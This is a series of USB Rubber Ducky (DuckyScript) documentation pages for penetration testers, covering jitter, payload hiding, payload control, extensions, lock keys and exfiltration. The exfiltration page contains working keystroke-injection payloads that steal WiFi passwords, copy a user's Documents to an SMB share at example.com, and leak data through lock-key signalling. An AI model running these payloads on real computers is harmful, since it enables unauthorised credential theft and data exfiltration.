DELAY 2000
$_JITTER_ENABLED = TRUE
WHILE TRUE
STRINGLN The quick brown fox jumps over the lazy dog
END_WHILE
* The test string is typed continuously with a modulated delay between each key press.
$\_JITTER\_MAX [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter/#_jitter_max)
-----------------------------------------------------------------------------------------------------------
The `$_JITTER_MAX` internal variable sets the maximum time between key presses in milliseconds. The default is 20 ms.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter/#example-1)
REM Example Jitter with increasing $_JITTER_MAX
ATTACKMODE HID STORAGE
DELAY 2000
$_JITTER_ENABLED = TRUE
WHILE TRUE
STRINGLN The quick brown fox jumps over the lazy dog
$_JITTER_MAX = ($_JITTER_MAX * 2)
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter/#result)
* With each iteration of typing the test string the jitter limit is doubled, yielding slower and more sporadic typing.
* * *
[_navigate\_before_ Payload Control](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/)
[Payload Hiding _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-hiding/)
---
# Payload Hiding | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Payload Hiding
==============
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-hiding/#overview)
----------------------------------------------------------------------------------------------------------
In certain circumstances it may be desirable for the mass storage device enumerated by the target when using `ATTACKMODE STORAGE` not to contain an `inject.bin` payload file on its root. To that end, the `HIDE_PAYLOAD` and `RESTORE_PAYLOAD` commands may come in handy.
HIDE\_PAYLOAD and RESTORE\_PAYLOAD [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-hiding/#hide_payload-and-restore_payload)
------------------------------------------------------------------------------------------------------------------------------------------------------------
The `HIDE_PAYLOAD` command will remove the `inject.bin` file (and `seed.bin` file, if it too exists) from the root of the MicroSD card.
info
The `HIDE_PAYLOAD` and `RESTORE_PAYLOAD` commands must be executed before entering an `ATTACKMODE STORAGE` state.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-hiding/#example)
REM Example payload hiding and restoring
ATTACKMODE OFF
BUTTON_DEF
ATTACKMODE OFF
RESTORE_PAYLOAD
ATTACKMODE STORAGE
END_BUTTON
HIDE_PAYLOAD
ATTACKMODE HID STORAGE
DELAY 2000
STRING Nothing to see here...
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-hiding/#result)
* Upon first enumeration, the attached computer will not be able to see the i`nject.bin` or `seed.bin` files on the USB Rubber Ducky storage.
* Pressing the button will re-enumerate the USB Rubber Ducky storage with both files visible once more.
warning
The `RESTORE_PAYLOAD` command will write the currently running payload from volatile memory, including the values for all stored variables, to the disk as `inject.bin`.
report
Executing the `HIDE_PAYLOAD` command will erase the running payload from the disk. If no subsequent `RESTORE_PAYLOAD` command is executed before detaching the USB Rubber Ducky, the payload will not appear on the disk.
* * *
[_navigate\_before_ Jitter](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter/)
[Storage Activity _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/)
---
# Payload Control | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Payload Control
===============
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#overview)
-----------------------------------------------------------------------------------------------------------
In addition to the logic, loops and functions that provide complex payload control, a few additional commands exist to manipulate the execution of a payload.
RESTART\_PAYLOAD [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#restart_payload)
--------------------------------------------------------------------------------------------------------------------------
The `RESTART_PAYLOAD` command ceases any further execution, restarting the payload from the beginning.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#example)
REM Example RESTART_PAYLOAD
ATTACKMODE HID STORAGE
DELAY 2000
STRINGLN Hello, World!
RESTART_PAYLOAD
STRINGLN Nothing to see here.
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#result)
* The payload loop typing the “`Hello, World!`” line infinitely.
* The “`Nothing to see here.`” string will never be typed.
STOP\_PAYLOAD [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#stop_payload)
--------------------------------------------------------------------------------------------------------------------
The `STOP_PAYLOAD` command ceases and further execution.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#example-1)
REM Example STOP_PAYLOAD
ATTACKMODE HID STORAGE
DELAY 2000
BUTTON_DEF
STOP_PAYLOAD
END_BUTTON
WHILE TRUE
RANDOM_CHARACTER
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#result-1)
* The payload will continuously type a random character.
* Pressing the button will stop the payload.
RESET [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#reset)
-----------------------------------------------------------------------------------------------------
Not to be confused with the `RESTART_PAYLOAD` command, the will not change the payload flow. Rather, the `RESET` command will clear the HID keystroke buffer. This may be useful while debugging complex hold key states.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#example-2)
REM Example RESET
ATTACKMODE HID STORAGE
DELAY 2000
INJECT_MOD
HOLD SHIFT
HOLD a
DELAY 700
RELEASE a
RESET
DELAY 1000
STRING nd reset
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-control/#result-2)
* On a Windows or Linux target, the payload may result in `AAAAAAAAAAAAnd reset`
* Notice that a `RELEASE SHIFT` command was omitted, and yet the `nd reset` string is lowercase. This is because the `RESET` command released all keys.
* * *
[_navigate\_before_ Holding Keys](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/holding-keys/)
[Jitter _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter/)
---
# Exfiltration | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Exfiltration
============
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#overview)
--------------------------------------------------------------------------------------------------------
Data exfiltration, or simply exfiltration, refers to the transfer of data from a computer or other device. For the pentester, successful exfiltration on an engagement may demonstrate to the client a need for data loss prevention, hardware installation limits or other such mitigations.
The [NIST cybersecurity framework](https://www.nist.gov/cyberframework)
simply defines exfiltration at “the unauthorized transfer of information from a system”, where as the [MITRE ATT&CK](https://attack.mitre.org/)
framework elaborates to say:
> Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.
The two most common exfiltration techniques, as cataloged by the MITRE ATT&CK framework:
* Exfiltration over a physical medium.
* Exfiltration over network medium.
This section will cover the two most common exfiltration techniques, as well as a third new and novel technique specific to the USB Rubber Ducky with DuckyScript 3.0 — [Keystroke Reflection](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#hid-exfiltration)
.
Physical Medium Exfiltration [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#physical-medium-exfiltration)
------------------------------------------------------------------------------------------------------------------------------------------------
Physical medium encompasses exfiltration over USB ([T1052.001](https://attack.mitre.org/techniques/T1052/001)
), and much like it sounds may simply involve copying data to a mass storage “flash drive” — which the USB Rubber Ducky may function by using the `ATTACKMODE STORAGE` command.
The USB Rubber Ducky excels at small file exfiltration via USB mass storage due to its convenience, and the fact that it may evade hardware installation limiting mitigation techniques relying on hardware identifiers. See the section on [spoofing Vendor ID and Product ID](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#spoofing-vendor-and-product-ids)
.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#example)
info
Examples on this page use blocks of `STRING` commands rather than a single `STRING` command intentionally for documentation legibility.
REM Example Simple (unobfuscated) USB Exfiltration Technique for Windows
REM Saves currently connected wireless LAN profile (SSID & Key) to DUCKY
ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 100
STRING powershell "$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRING netsh wlan show profile name=(Get-NetConnectionProfile).Name key=
STRING clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>>$m':\'$env:
STRING computername'.txt'"
ENTER
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#result)
* This short Powershell one-liner will executed from the Windows Run dialog.
* The drive letter of the volume with the label “`DUCKY`” will be saved in the `$m` variable.
* The `netsh` command will get the network name (SSID) and passphrase (key) for the currently connected network (`(Get-NetConnectionProfile).Name`).
* The results of the `netsh` command (filtered for only SSID and key) will be redirected (saved) to a file on the root of the “`DUCKY`” drive, saved as the computer name (in `.txt` format).
This example illustrates the USB Rubber Ducky capabilities for targeted exfiltration of key data. Keep in mind the FAT filesystem size limitations and USB 1.1 transfer speed considerations when using this technique for large amounts of data.
info
For high performance mass exfiltration using this technique, consider a specialized tool such as the Hak5 [Bash Bunny](https://hak5.org/products/bash-bunny)
. It features high speed, high capacity MicroSD expansion.
Network Medium Exfiltration [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#network-medium-exfiltration)
----------------------------------------------------------------------------------------------------------------------------------------------
Network medium encompasses exfiltration over alternative protocol ([T1048](https://attack.mitre.org/techniques/T1048)
), C2 channel ([T1041](https://attack.mitre.org/techniques/T1041)
), web service ([T1567](https://attack.mitre.org/techniques/T1567)
) and cloud account ([T1537](https://attack.mitre.org/techniques/T1537)
). Collectively, these are all network medium exfiltration techniques, many of which may be detected and mitigated at the network level.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#example-1)
REM Example Simple (unobfuscated) SMB Exfiltration Method for Windows
ATTACKMODE HID
DELAY 2000
DEFINE SMB_SERVER example.com
DEFINE SMB_SHARE sharedfolder
GUI r
DELAY 100
STRING powershell "cp -r $env:USERPROFILE\Documents\* \\
STRING SMB_SERVER
STRING \
STRING SMB_SHARE
STRING "
ENTER
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#result-1)
* This short Powershell one-liner, executed from the Windows Run dialog, will copy all documents (including subfolders) from the currently logged in user account’s documents folder to the defined SMB share.
info
Remember, when using a `DEFINE` with `STRING` each constant must be on a new line.
This example is naive. Use with caution. Keep in mind that most networks block SMB connections at the firewall. This payload is for illustrative purposes.
info
For advanced “bring-your-own-network” exfiltration techniques which do not traverse the local network, consider the Hak5 [Bash Bunny](https://hak5.org/products/bash-bunny)
. It features `ATTACKMODE AUTO_ETHERNET`.
The Keystroke Reflection Attack [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#the-keystroke-reflection-attack)
------------------------------------------------------------------------------------------------------------------------------------------------------
As described in the previous section on [lock keys](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/)
, the USB Rubber Ducky features a USB [HID OUT endpoint](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#end-points-and-control-codes)
which may accept control codes for the purposes of toggling the lock key LED indicators.
In much the same way **Keystroke Injection attacks** take advantage of the keyboard-computer trust model, **Keystroke Reflection attacks** take advantage of the keyboard-computer architecture.
By taking advantage of this architecture, the USB Rubber Ducky may glean sensitive data by means of Keystroke Reflection — using the lock keys as an exfiltration pathway.
This may be particularly useful for performing exfiltration attacks against targets on air-gapped networks where traditional network medium exfiltration techniques are not viable. Similarly, devices with strict endpoint device restrictions may be susceptible to Keystroke Reflection as it does not take advantage of well known physical medium exfiltration techniques.
Keystroke Reflection is a new side-channel exfiltration technique developed by Hak5 — the same organization that developed Keystroke Injection. With its debut on the new USB Rubber Ducky, it demonstrates a difficult to mitigate attack as it does not rely on a system weakness, rather the system design and implementation dating back to 1984.
The Keystroke Reflection attack consists of two phases. In the first phase — performed as part of a keystroke injection attack — the data of interest, or “loot”, is gathered from the target and encoded as lock keystrokes for reflection.
In the second phase, the USB Rubber Ducky enters Exfil Mode where it will act as a control code listener on the HID OUT endpoint. This is done using the `$_EXFIL_MODE_ENABLED` internal variable. Then, the target reflects the encoded lock keystrokes. The binary values of the reflected, or “bit banged”, lock keys are stored as 1’s and 0’s in the loot.bin file on the USB Rubber Ducky.
On Windows targets, powershell may perform the reflection. On Linux targets, bash may be used. macOS support is **very limited** by OS and architecture.
Using Keystroke Reflection with DuckyScript, both files and variables may be stored on the USB Rubber Ducky storage without exposing the mass storage “flash drive” to the target computer.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#example-2)
REM Example Simple (unobfuscated) Keystroke Reflection Attack for Windows
REM Saves currently connected wireless LAN profile (SSID & Key) to DUCKY
ATTACKMODE HID
LED_OFF
DELAY 2000
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
REM Store the currently connected wireless LAN SSID & Key to %tmp%\z
GUI r
DELAY 100
STRING powershell "netsh wlan show profile name=(Get-NetConnectionProfile)
STRING .Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z"
ENTER
DELAY 100
REM Convert the stored credentials into CAPSLOCK and NUMLOCK values.
GUI r
DELAY 100
STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,
STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else
STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"
ENTER
DELAY 100
REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky.
GUI r
DELAY 100
STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;
STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"
ENTER
DELAY 100
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#result-2)
* Per the initial `ATTACKMODE` command. the USB Rubber Ducky will act as a HID keyboard.
* `SAVE_HOST_KEYBOARD_LOCK_STATE` will save the state of the lock key LEDs, as reported by the target, so that they may be restored to their original configuration after the Keystroke Reflection attack is performed.
* `$_EXFIL_MODE_ENABLED = TRUE` will instruct the USB Rubber Ducky to listen for control codes on the USB HID OUT endpoint, saving each change as a bit within `loot.bin`.
* `$_EXFIL_LEDS_ENABLED = TRUE` will show flash the USB Rubber Ducky LED as loot is saved, useful when debugging. Set as `FALSE` for a more stealthy operation, however the flash drive case should sufficiently conceal the LED.
* The first powershell one-liner, injected into the run dialog, will save the currently connected WiFi network name (SSID) and plaintext passphrase to a temporary file. The file, known as the “loot”, is saved as “`z`” within `%TEMP%` (`$env:tmp\z`) directory, encoded in standard ASCII.
* The second powershell one-liner will convert the temporary ASCII loot file, bit by bit, into a set of caps lock and num lock key values. It will conclude this file with a final scroll lock value.
* The third and final powershell one-liner, in software, will “press” the lock keys indicated by the temporary file via the SendKeys .NET class. The effect of this will be the binary values of the converted loot sent to the USB Rubber Ducky, one bit at a time, via the USB HID OUT endpoint.
* Additionally, the temporary file will then be removed. The pentester may consider including additional techniques for obfuscation, optimization and reducing the forensic footprint.
* `WAIT_FOR_SCROLL_CHANGE` will get triggered when the final key “press” from the SendKeys class is executed, thereby continuing the payload.
* Finally `$_EXFIL_MODE_ENABLED = FALSE` will instruct the USB Rubber Ducky to conclude saving the received control codes in loot.bin and `RESTORE_HOST_KEYBOARD_LOCK_STATE` will restore the lock key LEDs to their original state before the exfiltration began.
Working With Loot [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#working-with-loot)
--------------------------------------------------------------------------------------------------------------------------
In terms of exfiltration, the data captured on any engagement is considered loot. With Keystroke Reflection on the USB Rubber Ducky, loot is stored in a `loot.bin` file on the root of the MicroSD card. This file maintains the `.bin` extension, as it may contain any arbitrary binary data — as received bit by bit over the USB HID OUT endpoint via control codes intended to manipulate the lock key LED states.
Depending on the data exfiltrated, this `loot.bin` file may be treated in various different ways. For example, if the data retrieved was originally in an ASCII format, such as in the WiFi credential exfiltrating example, then simply renaming the file `loot.bin` to `loot.txt` will yield a file readable by any standard text editor such as notepad, TextEdit, vim and the like without manipulation.
Similarly, if the data exfiltrated happened to be a jpeg image, renaming the file extension from `.bin` to `.jpeg` would yield an image readable by conventional means.
If however multiple files were exfiltrated, they would exist concatenated within the `loot.bin` file and further processing would be necessary. In these cases, file processing tools would be necessary to carve out the original files.

HextEdit hex editor for macOS showing loot.bin file containing WiFi network name and passphrase
Arbitrary data, such as variables, may also be exfiltrated — in which case a hex editor may be the most appropriate tool to decode the loot. Many free and paid hex editors exist for each platform. Both [exHexEditor](https://github.com/EUA/wxHexEditor)
and [wxMEdit](https://github.com/wxMEdit/wxMEdit)
are open source, cross platform options worth considering.
Variable Exfiltration [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#variable-exfiltration)
----------------------------------------------------------------------------------------------------------------------------------
In addition to saving data in `loot.bin` from a target via the Keystroke Reflection pathway, any variable in Ducky Script may be saved, or exfiltrated, to the loot file using the `EXFIL` command.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#example-3)
REM Example variable exfiltration
VAR $FOO = 1337
EXFIL $FOO
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#result-3)
* The binary contents of the variable `$FOO` will be written (appended) to the `loot.bin` file on the root of the USB Rubber Ducky MicroSD card.
While the above example may seem mundane, consider the following:
Using variable exfiltration, along with a combination of `ATTACKMODE` parameters `VID` and `PID`, and a loop containing incremental `VID` and `PID` variables and lock key detection — one may write a payload to brute force the allow list of an otherwise hardware installation limited computer, then write the allowed `VID` and `PID` values to `loot.bin` for further analysis.
* * *
[_navigate\_before_ Lock Keys](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/)
[Extensions _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/)
---
# Extensions | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Extensions
==========
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#overview)
------------------------------------------------------------------------------------------------------
It should be clear by now that so much is possible with DuckyScript 3.0. The combination of keystroke injection with various attack modes, logic and data processing, along with the built-in features like randomization and internal variables — the possibilities for advanced payload functions seems endless.
As the payload library continues to grow, so too will the DuckyScript 3.0 language. To that end, the extensions feature of the language and editor facilitate the continued growth of the language.
Extensions are blocks of reusable code which may be implemented in any payload. Think of them as snippets, or building blocks, upon which your next payload may benefit.
While Hak5 developers cannot envision all possible use cases for the USB Rubber Ducky, the DuckyScript language has been architected in such a way so that the community as a whole may gain new features and abilities with each contributed extension.
This section describes how to build, publish and use existing published extensions, as well as a summary of a few popular extensions.
Extensions (beyond some examples) are currently reserved for _collections of helper functions (+ required variables, defines, and configuration options)_ required to make a **complex task simple and reusable** - abstracting very complex problems down into one or a few calls for the ease of use to others (example: the translate extension).
Using Extensions [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#using-extensions)
----------------------------------------------------------------------------------------------------------------------
The code blocks within an extension are executed just like any other DuckyScript. The syntax is to wrap the block of code within the `EXTENSION Name` and `END_EXTENSION` commands (where `Name` is the name or title of the extension). Best practice is to include functions within the extension, which may be called as necessary.
### How Extensions Work [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#how-extensions-work)
Extensions begin with a special command, `VERSION`, which is used to indicate the version of an extension. This is useful because extensions may change over time. [Payload Studio](https://encoder.hak5.org/)
will automatically check the version of the used extension with the online extension repository. Within Payload Studio, a current extension will show an `UP-TO-DATE` tag while an old extension will show `OUT-OF-DATE` tag.
When using an extension that has been included in the USB Rubber Ducky repository, Payload Studio will show `OFFICIAL` tag. User created extensions which have not been included in the repository will show `UNOFFICIAL` tag. An official extension which has been modified will show a `MODIFIED` tag.

PayloadStudio showing a modified, official, up-to-date extension
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#example)
Typically extensions include functions which may be reused across many different payloads. With the below example, any payload including the `ASCIIDUCK` extension may call `DUCK()` to enjoy a quacking duck ASCII art.
EXTENSION ASCIIDUCK
VERSION 1.0
FUNCTION DUCK()
STRINGLN _
STRINGLN __(.)< QUACK!
STRINGLN \___)
END_FUNCTION
END_EXTENSION
STRING Let's run our first extension:
DUCK()
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#result)
* The payload will type “`Let's run our first extension:`” followed by the Duck ASCII art.
info
Similar to payloads which may be contributed to the open source [USB Rubber Ducky Payload repository](https://github.com/hak5/usbrubberducky-payloads)
via pull-request, extensions too may be added.
Adding Extensions to your payload [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#adding-extensions-to-your-payload)
--------------------------------------------------------------------------------------------------------------------------------------------------------
### Directly within PayloadStudio [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#directly-within-payloadstudio)
Copy and paste is a thing of the past! PayloadStudio automatically includes all the official `EXTENSION`s for easy access within autocomplete.
info
Just start typing the extension name **then select it** **from the autocomplete menu**

Adding extension from autocomplete
### Github [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#github)
Alternatively, the full library of `EXTENSION`s can be found in the [USB Rubber Ducky Payload repository](https://github.com/hak5/usbrubberducky-payloads)
within the [Extensions folder](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/extensions)
.
Featured Extensions [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#featured-extensions)
----------------------------------------------------------------------------------------------------------------------------
### OS\_DETECT [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#os_detect)
The `OS_DETECT` extension includes functions which will attempt to enumerate the target operating system using a variety of techniques including testing `$_HOST_CONFIGURATION_REQUEST_COUNT` and `$_RECEIVED_HOST_LOCK_LED_REPLY`.
The `DETECT_OS()` function will return to `$_OS` as `WINDOWS`, `MACOS`, `LINUX`, `CHROMEOS`, `ANDROID` or `IOS`.
{% hint style=“danger” %} The below snippets are simply **examples of usage**. See [Adding Extensions to your payload](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#adding-extensions-to-your-payload)
section for usage within your payload {% endhint %}
EXTENSION OS_DETECTION
REM VERSION 1.0
REM Omitted for brevity - DO NOT COPY PASTE FROM THIS EXAMPLE.
REM SEE ABOVE FOR ADDING TO YOUR PAYLOAD
END_EXTENSION
DETECT_OS()
IF ($_OS == WINDOWS) THEN
STRING Hello Windows!
ELSE IF ($_OS == MACOS) THEN
STRING Hello Mac!
ELSE IF ($_OS == LINUX) THEN
STRING Hello Linux!
ELSE IF ($_OS == IOS) THEN
STRING Hello iOS!
ELSE IF ($_OS == CHROMEOS) THEN
STRING Hello ChromeOS!
ELSE IF ($_OS == ANDROID) THEN
STRING Hello Android!
ELSE
STRING Hello World!
END_IF
### TRANSLATE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/#translate)
The `TRANSLATE` extension can type the values of variables. It includes the functions `TRANSLATE_INT`, `TRANSLATE_HEX`, and `TRANSLATE_BOOL`. Call these functions by first assigning the `$INPUT` variable.
EXTENSION TRANSLATE
REM VERSION 1.0
REM Omitted for brevity - DO NOT COPY PASTE FROM THIS EXAMPLE.
REM SEE ABOVE FOR ADDING TO YOUR PAYLOAD
END_EXTENSION
VAR $FOO = 1337
$INPUT = $FOO
TRANSLATE_INT()
REM This will type the digits "1337".
$INPUT = $_CURRENT_VID
TRANSLATE_HEX()
REM This will type the HEX value of the current Vendor ID.
VAR $BAR = FALSE
$INPUT = $BAR
TRANSLATE_BOOL()
REM This will type "FALSE".
* * *
[_navigate\_before_ Exfiltration](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/)
[Conditional Compilation _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/)
---
# Lock Keys | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Lock Keys
=========
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#overview)
-----------------------------------------------------------------------------------------------------
Computer keyboards are typically thought of as being essentially one-way communications peripherals, but this isn’t always the case. There are actually methods for bi-directional communications, which may be taken advantage of using the USB Rubber Ducky.
### Brief History [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#brief-history)
First, a brief history. In 1981 the “IBM Personal Computer” was introduced — the origins of the ubiquitous “PC” moniker. It featured an 83-key keyboard that was unique in the way it handled three significant keys.
Caps lock, num lock and scroll lock. Collectively, the lock keys. These toggle keys typically change the behavior of subsequent keypresses. As an example, pressing the caps lock key would make all letter keypresses uppercase. The lock key state would be indicated by a light on the keyboard.
At the time, the 1981 IBM-PC keyboard itself was responsible for maintaining the state of the lock keys and lighting the corresponding LED indicators. With the introduction of the IBM PC/AT in 1984, that task became the responsibility of the computer.

PC/AT keyboard
This fundamental change in computer-keyboard architecture carried over from early 1980’s and 1990’s keyboards, with their DIN and PS/2 connectors, to the de facto standard 104+ key keyboards of the modern USB era.
### End Points and Control Codes [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#end-points-and-control-codes)
Today, keyboards implement the Human Interface Device (USB HID) specification. This calls for an “IN endpoint” for the communication of keystrokes from the keyboard to the computer, and an “OUT endpoint” for the communication of lock key LED states from the computer to the keyboard.
A set of HID codes for LED control (spec code page 08) define this communication. Often, these control codes are sent from the computer to the keyboard via the OUT endpoint when a computer starts. As an example, many computer BIOS (or EUFI) provide an option to enable num lock at boot. If enabled, the control code is sent to the keyboard when the computer powers on.
As another example, one may disable a lock key all together. On a Linux system, command line tools like xmodmap, setxkbmap and xdotool may be used to disable caps lock. Similarly, an edit to registry may perform a similar task on Windows systems.
In both cases the keyboard, naive to the attached computer’s configuration, will still send the appropriate control code to the IN endpoint when the caps lock key is pressed. However, the computer may disregard the request and neglect to send the corresponding LED indication control code back to the keyboard via the OUT endpoint.
### Synchronous Reports [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#synchronous-reports)
As demonstrated, a target may accept keystroke input from multiple HID devices. Put another way, all USB HID keyboard devices connected to a computer feature an IN endpoint, from which keystrokes from the keyboard may be sent to the target computer.
Similarly, all USB HID keyboards connected to the computer feature an OUT endpoint, to which the computer may send caps lock, num lock and scroll lock control codes for the purposes of controlling the appropriate lock key LED light.
This may be validated by connecting multiple USB keyboards to a computer. Press the caps lock key on one keyboard, and watch the caps lock indicator on all keyboards light up.

Press the caps lock key on the Lenovo keyboard. Both Lenovo and Logitech keyboards light their caps lock LED.
Due to the synchronous nature of the control code being sent to all USB HID OUT endpoints, the USB Rubber Ducky may perform systematic functions based on the state of the lock keys.
report
While synchronous reporting has been validated on PC targets (e.g. Windows, Linux), macOS targets will behave differently based on OS version level.
WAIT\_FOR Commands [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#wait_for-commands)
------------------------------------------------------------------------------------------------------------------------
The various `WAIT_FOR...` commands will pause payload execution until the desired change occurs, similar to the function of `WAIT_FOR_BUTTON_PRESS`.
| Command | Description |
| --- | --- |
| `WAIT_FOR_CAPS_ON` | Pause until caps lock is turned on |
| `WAIT_FOR_CAPS_OFF` | Pause until caps lock is turned off |
| `WAIT_FOR_CAPS_CHANGE` | Pause until caps lock is toggled on or off |
| `WAIT_FOR_NUM_ON` | Pause until num lock is turned on |
| `WAIT_FOR_NUM_OFF` | Pause until num lock is turned off |
| `WAIT_FOR_NUM_CHANGE` | Pause until num lock is toggled on or off |
| `WAIT_FOR_SCROLL_ON` | Pause until scroll lock is turned on |
| `WAIT_FOR_SCROLL_OFF` | Pause until scroll lock is turned off |
| `WAIT_FOR_SCROLL_CHANGE` | Pause until scroll lock is toggled on or off |
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#example)
REM Example WAIT_FOR_CAPS_CHANGE Payload
ATTACKMODE HID STORAGE
LED_OFF
DELAY 2000
WHILE TRUE
LED_R
WAIT_FOR_CAPS_CHANGE
LED_G
WAIT_FOR_CAPS_CHANGE
END_WHILE
